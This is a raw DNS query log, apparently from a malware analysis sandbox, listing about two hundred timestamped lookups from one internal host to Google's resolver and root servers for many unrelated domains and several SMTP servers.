                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:35.699933052 CEST192.168.2.38.8.8.80x3b36Standard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:36.093583107 CEST192.168.2.38.8.8.80xce4cStandard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:36.187176943 CEST192.168.2.38.8.8.80xe190Standard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:37.005516052 CEST192.168.2.38.8.8.80x3e73Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:37.157424927 CEST192.168.2.38.8.8.80xb00eStandard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:37.162081003 CEST192.168.2.38.8.8.80xeeaaStandard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:37.215691090 CEST192.168.2.38.8.8.80xc4e0Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:37.218565941 CEST192.168.2.38.8.8.80x22fbStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:38.196130991 CEST192.168.2.38.8.8.80x62b3Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:38.211955070 CEST192.168.2.38.8.8.80xf0aStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:38.477404118 CEST192.168.2.38.8.8.80x7772Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:38.508939028 CEST192.168.2.38.8.8.80xb2c1Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:38.519963026 CEST192.168.2.38.8.8.80x7faStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:38.521028996 CEST192.168.2.38.8.8.80x9ec7Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:38.523405075 CEST192.168.2.38.8.8.80x94c8Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:38.529952049 CEST192.168.2.38.8.8.80xd22bStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:38.688072920 CEST192.168.2.38.8.8.80xf58fStandard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:38.714632988 CEST192.168.2.38.8.8.80xe681Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.242980003 CEST192.168.2.38.8.8.80x2165Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.242980003 CEST192.168.2.38.8.8.80x45d0Standard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.395876884 CEST192.168.2.38.8.8.80xb0c1Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.419898987 CEST192.168.2.38.8.8.80x743eStandard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.420608044 CEST192.168.2.38.8.8.80xb6e5Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.619112015 CEST192.168.2.38.8.8.80x6d02Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.630976915 CEST192.168.2.38.8.8.80x56d6Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:39.740885973 CEST192.168.2.38.8.8.80xb6aaStandard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:40.007679939 CEST192.168.2.38.8.8.80x6e13Standard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:40.251724005 CEST192.168.2.3128.8.10.900x19Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:40.534352064 CEST192.168.2.38.8.8.80xc734Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:40.931654930 CEST192.168.2.38.8.8.80x68dStandard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:41.178397894 CEST192.168.2.38.8.8.80x5466Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:41.422652006 CEST192.168.2.38.8.8.80xc7abStandard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:41.665160894 CEST192.168.2.38.8.8.80x98abStandard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:41.924806118 CEST192.168.2.38.8.8.80xdb88Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:42.448013067 CEST192.168.2.38.8.8.80x55a7Standard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:42.666596889 CEST192.168.2.38.8.8.80xb11aStandard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:42.776333094 CEST192.168.2.38.8.8.80xf8c6Standard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:42.999756098 CEST192.168.2.38.8.8.80x77aaStandard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:43.494992018 CEST192.168.2.38.8.8.80xb045Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:43.687164068 CEST192.168.2.38.8.8.80xef4cStandard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:43.912873983 CEST192.168.2.38.8.8.80xb945Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.063544035 CEST192.168.2.38.8.8.80xd1c8Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.093797922 CEST192.168.2.38.8.8.80x14ccStandard query (0)dataform.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.136055946 CEST192.168.2.38.8.8.80xabf9Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.179235935 CEST192.168.2.38.8.8.80xa63bStandard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.216113091 CEST192.168.2.38.8.8.80x9ae8Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.330231905 CEST192.168.2.38.8.8.80x98e0Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.388654947 CEST192.168.2.38.8.8.80x42cStandard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.394890070 CEST192.168.2.38.8.8.80x52b7Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.421356916 CEST192.168.2.38.8.8.80x6b54Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.476443052 CEST192.168.2.38.8.8.80xc267Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.533653021 CEST192.168.2.38.8.8.80x2b69Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.712276936 CEST192.168.2.38.8.8.80x3d9eStandard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.858510971 CEST192.168.2.38.8.8.80x6144Standard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:45.120237112 CEST192.168.2.38.8.8.80xb936Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:45.283608913 CEST192.168.2.38.8.8.80x1bf2Standard query (0)smtp.compuserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:45.363857031 CEST192.168.2.38.8.8.80x9049Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:45.527198076 CEST192.168.2.3192.58.128.300x4fStandard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:45.566541910 CEST192.168.2.3192.228.79.2010x76Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:45.593396902 CEST192.168.2.3193.0.14.1290xd3Standard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:45.913482904 CEST192.168.2.38.8.8.80xbd1bStandard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.066788912 CEST192.168.2.38.8.8.80x15bbStandard query (0)smtp.compuserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.105360985 CEST192.168.2.38.8.8.80x703aStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.106120110 CEST192.168.2.38.8.8.80x2815Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.134182930 CEST192.168.2.38.8.8.80xca56Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.135106087 CEST192.168.2.38.8.8.80x22eeStandard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.140408993 CEST192.168.2.38.8.8.80xf90eStandard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.140993118 CEST192.168.2.38.8.8.80x232Standard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.300218105 CEST192.168.2.38.8.8.80xdc48Standard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.307327986 CEST192.168.2.38.8.8.80xb907Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.383030891 CEST192.168.2.38.8.8.80xa8dStandard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.388793945 CEST192.168.2.38.8.8.80x6f2fStandard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.389332056 CEST192.168.2.38.8.8.80x2e80Standard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.683559895 CEST192.168.2.38.8.8.80x61dStandard query (0)shenhgts.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.790118933 CEST192.168.2.38.8.8.80x9277Standard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.886738062 CEST192.168.2.38.8.8.80x70f1Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.927839994 CEST192.168.2.38.8.8.80x1003Standard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.069068909 CEST192.168.2.38.8.8.80x510bStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.535474062 CEST192.168.2.38.8.8.80x8ddfStandard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.683160067 CEST192.168.2.38.8.8.80x6a3cStandard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.772138119 CEST192.168.2.38.8.8.80xbf95Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.776313066 CEST192.168.2.38.8.8.80x4a0dStandard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.801295996 CEST192.168.2.38.8.8.80xf600Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.802225113 CEST192.168.2.38.8.8.80xba3Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.802665949 CEST192.168.2.38.8.8.80x3a44Standard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.802665949 CEST192.168.2.38.8.8.80xd5b9Standard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.804318905 CEST192.168.2.38.8.8.80x711Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.835459948 CEST192.168.2.38.8.8.80xce17Standard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.883676052 CEST192.168.2.38.8.8.80x6defStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.886630058 CEST192.168.2.38.8.8.80xb8aaStandard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.908600092 CEST192.168.2.38.8.8.80x5462Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.908649921 CEST192.168.2.38.8.8.80xe952Standard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.909826040 CEST192.168.2.38.8.8.80x8817Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.085860968 CEST192.168.2.38.8.8.80x510bStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.168932915 CEST192.168.2.38.8.8.80xace0Standard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.183577061 CEST192.168.2.38.8.8.80xa62eStandard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.216425896 CEST192.168.2.38.8.8.80x956bStandard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.287854910 CEST192.168.2.38.8.8.80x9accStandard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.296652079 CEST192.168.2.38.8.8.80xdc58Standard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.298950911 CEST192.168.2.38.8.8.80xd6e1Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.298950911 CEST192.168.2.38.8.8.80xf552Standard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.324048042 CEST192.168.2.38.8.8.80xcb03Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.369900942 CEST192.168.2.38.8.8.80x3c78Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.396401882 CEST192.168.2.38.8.8.80x7a36Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.398691893 CEST192.168.2.38.8.8.80x420aStandard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.398691893 CEST192.168.2.38.8.8.80xd5eaStandard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.414499998 CEST192.168.2.38.8.8.80x56c5Standard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.414911985 CEST192.168.2.38.8.8.80x8b16Standard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.970124006 CEST192.168.2.38.8.8.80xb907Standard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.970124006 CEST192.168.2.38.8.8.80x564fStandard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.983710051 CEST192.168.2.38.8.8.80x316dStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.006709099 CEST192.168.2.38.8.8.80xe7faStandard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.084336042 CEST192.168.2.38.8.8.80xa525Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.142008066 CEST192.168.2.38.8.8.80x510bStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.148827076 CEST192.168.2.38.8.8.80xa2f8Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.171010017 CEST192.168.2.38.8.8.80xc32fStandard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.417294025 CEST192.168.2.38.8.8.80xdfceStandard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.479034901 CEST192.168.2.38.8.8.80x9cf6Standard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.568048000 CEST192.168.2.38.8.8.80x4cStandard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.634089947 CEST192.168.2.38.8.8.80xfc22Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.781385899 CEST192.168.2.38.8.8.80xcb2dStandard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.883680105 CEST192.168.2.38.8.8.80x1dd6Standard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.984503031 CEST192.168.2.38.8.8.80x59b2Standard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.984503031 CEST192.168.2.38.8.8.80x286dStandard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.987803936 CEST192.168.2.38.8.8.80x2088Standard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.988641977 CEST192.168.2.38.8.8.80xd2dfStandard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.990413904 CEST192.168.2.38.8.8.80xb012Standard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.998634100 CEST192.168.2.38.8.8.80xe79dStandard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.182698965 CEST192.168.2.38.8.8.80xa2f8Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.219770908 CEST192.168.2.38.8.8.80x5657Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.408710003 CEST192.168.2.38.8.8.80x3a3fStandard query (0)smtp.sbcglobal.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.606955051 CEST192.168.2.38.8.8.80xb2ffStandard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.608169079 CEST192.168.2.38.8.8.80x86a1Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.832545996 CEST192.168.2.38.8.8.80xfb28Standard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.846688986 CEST192.168.2.38.8.8.80x8e67Standard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.860153913 CEST192.168.2.38.8.8.80xccf2Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.862530947 CEST192.168.2.38.8.8.80xba10Standard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.863881111 CEST192.168.2.38.8.8.80x343aStandard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.902879953 CEST192.168.2.38.8.8.80x3d5Standard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.002042055 CEST192.168.2.38.8.8.80x286dStandard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.126782894 CEST192.168.2.38.8.8.80x572bStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.209008932 CEST192.168.2.38.8.8.80x67e5Standard query (0)smtp.sbcglobal.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.240291119 CEST192.168.2.38.8.8.80x322bStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.256791115 CEST192.168.2.38.8.8.80xa718Standard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.268671989 CEST192.168.2.38.8.8.80x2f08Standard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.272500992 CEST192.168.2.38.8.8.80xb5b1Standard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.308648109 CEST192.168.2.38.8.8.80x120cStandard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.311419964 CEST192.168.2.38.8.8.80xcb00Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.311419964 CEST192.168.2.38.8.8.80xa2ddStandard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.313092947 CEST192.168.2.38.8.8.80xa4bfStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.314476967 CEST192.168.2.38.8.8.80xe756Standard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.316075087 CEST192.168.2.38.8.8.80x2320Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.335499048 CEST192.168.2.38.8.8.80x4f13Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.338543892 CEST192.168.2.38.8.8.80x323dStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.387888908 CEST192.168.2.38.8.8.80xa790Standard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.390783072 CEST192.168.2.38.8.8.80x232eStandard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.394505978 CEST192.168.2.38.8.8.80xa612Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.404807091 CEST192.168.2.38.8.8.80x34b9Standard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.431708097 CEST192.168.2.38.8.8.80xb12fStandard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.441301107 CEST192.168.2.38.8.8.80xcfaStandard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.462270021 CEST192.168.2.38.8.8.80x17b4Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.496766090 CEST192.168.2.38.8.8.80xb43eStandard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.508801937 CEST192.168.2.38.8.8.80xdab5Standard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.529486895 CEST192.168.2.38.8.8.80x50edStandard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.648709059 CEST192.168.2.38.8.8.80x55abStandard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.685709953 CEST192.168.2.38.8.8.80xff12Standard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.712328911 CEST192.168.2.38.8.8.80xc33bStandard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.747383118 CEST192.168.2.38.8.8.80x9e16Standard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.773886919 CEST192.168.2.38.8.8.80xe7f8Standard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.776824951 CEST192.168.2.38.8.8.80xf244Standard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.799252987 CEST192.168.2.38.8.8.80x837fStandard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.799253941 CEST192.168.2.38.8.8.80xdfdcStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.824338913 CEST192.168.2.38.8.8.80xab1cStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.850435972 CEST192.168.2.38.8.8.80x4340Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.893872976 CEST192.168.2.38.8.8.80xb658Standard query (0)www.photo4b.comA (IP address)IN (0x0001)false
